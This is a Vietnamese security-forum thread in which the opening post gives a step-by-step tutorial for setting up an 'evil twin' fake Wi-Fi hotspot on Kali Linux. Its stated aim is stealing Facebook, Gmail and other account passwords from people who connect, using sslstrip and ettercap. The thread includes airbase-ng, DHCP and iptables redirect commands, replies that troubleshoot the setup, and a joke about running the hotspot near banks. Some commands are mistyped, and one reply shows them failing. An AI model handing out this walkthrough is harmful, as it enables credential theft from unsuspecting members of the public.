Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỷ

Hackerstudent93

VIP Members
30/09/2013
38
340 bài viết
Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỷ
Hôm nay mình sẽ hướng dẫn các Hack facbook , gmail, yahoo, twitter bằng cách Bằng cách Create a fake, malicious Wireless Network using Kali.

hacke.png

Ý tưởng thế này: chúng ta sẽ phát ra một mạng wifi giả mạo với tên là " wifi free " rồi cho người dùng tha hồ mà truy cập vào dùng miễn phí, sau đó chúng ta sẽ đánh cắp user và password của họ bằng cách sử dụng tool SSlstrip và Ettercap trong kali :rolleyes:

Bên dưới là tất cả các lệnh mà các bạn sẽ sử dụng

- Nhận default bằng cách sử dụng lệnh
route -n

- Cài đặt DHCP3 Server bằng cách sử dụng lệnh
sudo apt-get install dhcp3-server

- Nào bây giờ chúng ta sẽ edit file cấu hình DHCP như sau
vi /etc/dhcpd.conf
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.1.0 netmask 255.255.255.0 {
Option routers 192.168.1.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.1.1;
Range 192.168.1.2 192.168.1.40;
}


sau đó thì lưa lại

- Tiếp theo gõ
airmon-ng

Start monitor mode bằng cách sử dụng lệnh
airmong-ng start wlan0

- Tạo một fake access point bằng cách sử dụng lệnh
airbase-ng -c 11 -e freewifi mon0

- Và bây giờ thì nhập tất cả các lệnh sau cho thật chính xác và cẩn thận
Ifconfig at0 192.168.1.1 netmask 255.255.255.0
Ifconfig at0 mtu 1400
Route add –net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
Echo 1 > /proc/sys/net/ipv4/ip_forward
Iptables –t nat –A PREROUTNG –p udp –j DNAT –to 192.168.0.1
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: ( Hack facebook, Gmail, twitter ...) Bằng cách Create a fake, malicious Wireless Network using

Anh em nào nếu chưa thực hiện được thành công, thì coment ở dưới, mình sẽ giải đáp và hỗ trợ các bạn nếu có thời gian :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Tất cả chạy đều ok nhưng không thể connect d.c vào cái fake AP :( bác có gặp trường hợp đó help e với
p/s : e dùng kali trên máy ảo , sử dụng usb wifi
Dùng thử linset thì nó báo lỗi thế này

Configuration file: /tmp/TMPlinset/hostapd.conf
Failed to update rate sets in kernel module
Using interface wlan0 with hwaddr xx:xx:3b:f1:f5:0c and ssid 'xxx'
wlan0: STA 60:6c:66:17:45:94 IEEE 802.11: did not acknowledge authentication response

wlan0: STA 60:6c:66:17:45:94 IEEE 802.11: did not acknowledge authentication response
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: did not acknowledge authentication response
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: disassociated
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: deauthenticated due to inactivity
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

mkhahero;17319 đã viết:
Tất cả chạy đều ok nhưng không thể connect d.c vào cái fake AP :( bác có gặp trường hợp đó help e với
p/s : e dùng kali trên máy ảo , sử dụng usb wifi
Dùng thử linset thì nó báo lỗi thế này

Configuration file: /tmp/TMPlinset/hostapd.conf
Failed to update rate sets in kernel module
Using interface wlan0 with hwaddr xx:xx:3b:f1:f5:0c and ssid 'xxx'
wlan0: STA 60:6c:66:17:45:94 IEEE 802.11: did not acknowledge authentication response

wlan0: STA 60:6c:66:17:45:94 IEEE 802.11: did not acknowledge authentication response
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: did not acknowledge authentication response
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: disassociated
wlan0: STA 90:18:7c:a6:41:da IEEE 802.11: deauthenticated due to inactivity

chụp ảnh màn hình của bạn cho tôi, rồi các đoạn code mà bạn gõ nữa để tỗi xem, chứ copy mỗi cái lỗi lên thế này thì xử lý thế nào được ? :rolleyes:
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

virus-png.2541



11-1-2017-9-58-43-am-png.2542




wordpress-png.2543




etc/dhcpd.conf

authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 10.0.1.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 10.0.1.255;
option routers 10.0.1.129;
option domain-name-servers 8.8.8.8;
range 10.0.1.130 10.0.1.140;
}

ifconfig at0 10.0.1.129 netmask 255.255.255.128
route add -net 10.0.1.128 netmask 255.255.255.128 gw 10.0.1.129
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.1.8:80
iptables -t nat -A POSTROUTING -j MASQUERADE
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

h1-jpg.308


h2-jpg.309


h3-jpg.310
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Còn thằng Linset thì báo như vầy :

upload_2017-11-1_11-0-42-png.2544



linset-jpg.311
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

mkhahero;17340 đã viết:
Còn thằng Linset thì báo như vầy :

View attachment 2544
đã xem qua file cấu hình và chụp ảnh màn hình của bạn, bạn cấu hình cũng như dùng tool khác của mình đề cập ở trong bài viết, các câu lệnh cũng khác, bạn đã tìm hiểu kỹ về Linset chưa? khuyên bạn dùng thử cách của mình. đoạn code ở dưới mình đã chạy ngon lành rồi bạn thử cấu hình tất cả mọi thứ rồi dùng tool ettercap và sslstrip trong kali xem thế nào, còn vấn đề của bạn mình không giúp được ;)
vi /etc/dhcpd.conf
Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.2.0 netmask 255.255.255.0 {
Option routers 192.168.2.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.2.1;
Range 192.168.2.2 192.168.2.40;
}
airmon-ng
airmon-ng start wlan0
kill pid
airbase-ng -c 11 -e freewifi mon0
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add –net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables –t nat –A PREROUTNG –p udp –j DNAT –-to 192.168.1.1
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

=.= ko biết bác test thế nào chứ mình ko nghĩ nó chạy đ.c =.=

Authoritative;
Default-lease-time 600;
Max-lease-time 7200;
Subnet 192.168.2.0 netmask 255.255.255.0 {
Option routers 192.168.2.1;
Option subnet-mask 255.255.255.0;
Option domain-name “freewifi”;
Option domain-name-servers 192.168.2.1;
Range 192.168.2.2 192.168.2.40;
}

route add –net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1

–net: Unknown host
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

mkhahero;17348 đã viết:
=.= ko biết bác test thế nào chứ mình ko nghĩ nó chạy đ.c =.=
vớ vẩn nào, cho một trận bây giờ, gõ bằng tay tất cả dòng lệnh một cách thật là chính xác và cẩn thận, nghiêm cấm mọi hành động
copy và dán , nhìn hình ảnh tôi chụp demo ở trên xem có chay không mà dám bảo là không chạy :rolleyes:
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

cái video demo hướng hẫn nguy hiểm quá bị youtube nó xóa rồi, mọi người tự làm theo hướng dẫn ở trên nhé :(
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Mở quán cafe wifi cạnh cơ quan, ngân hàng...:cool:
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

kooi_kool;18003 đã viết:
Mở quán cafe wifi cạnh cơ quan, ngân hàng...:cool:
Mở rùi cho mình cái địa chỉ, keke :cool:
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

kooi_kool;18003 đã viết:
Mở quán cafe wifi cạnh cơ quan, ngân hàng...:cool:
Cho mình uống cafe miễn phí của quán bạn được không ạ :p
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

Ko dùng VMware mà dùng VirtualBox mạng ở Bridge Mode được ko? :">
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Re: Nguy cơ mất tài khoản người dùng bởi phương pháp tấn công kẻ sinh đôi ma quỉ.

theheroofvn;18590 đã viết:
Ko dùng VMware mà dùng VirtualBox mạng ở Bridge Mode được ko? :">

Ngon lành nhé :D
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Thẻ
hack facbook kali wireless network
Bên trên